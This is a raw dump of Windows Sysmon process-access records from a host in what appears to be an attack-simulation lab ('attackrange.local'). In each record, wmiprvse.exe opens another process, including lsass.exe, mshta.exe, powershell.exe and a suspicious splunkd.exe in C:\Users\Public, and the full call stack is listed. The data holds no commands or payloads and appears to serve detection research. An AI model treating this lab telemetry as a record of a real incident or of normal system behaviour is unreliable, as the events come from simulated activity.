15:59:20.866{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2300-00000000A301}2924C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023807Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.866{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4988-6008-2000-00000000A301}2388C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023806Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.866{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1700-00000000A301}1656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023805Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.851{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1600-00000000A301}1536C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023804Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.851{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023803Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.851{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1400-00000000A301}1280C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023802Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.851{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1300-00000000A301}1264C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023801Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.851{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1200-00000000A301}1176C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023800Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.851{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1100-00000000A301}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023799Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.851{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1000-00000000A301}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023798Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.851{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0F00-00000000A301}1112C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023797Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.851{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023796Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.851{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0D00-00000000A301}996C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023795Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.851{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4986-6008-0C00-00000000A301}608C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023794Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.851{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023793Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.851{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4984-6008-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023792Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.663{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5357-6008-4106-00000000A301}7412C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023791Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.663{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5357-6008-4006-00000000A301}5512C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023790Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.663{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5357-6008-3F06-00000000A301}4668C:\Windows\SysWOW64\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023789Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.663{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5357-6008-3E06-00000000A301}6760C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023788Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 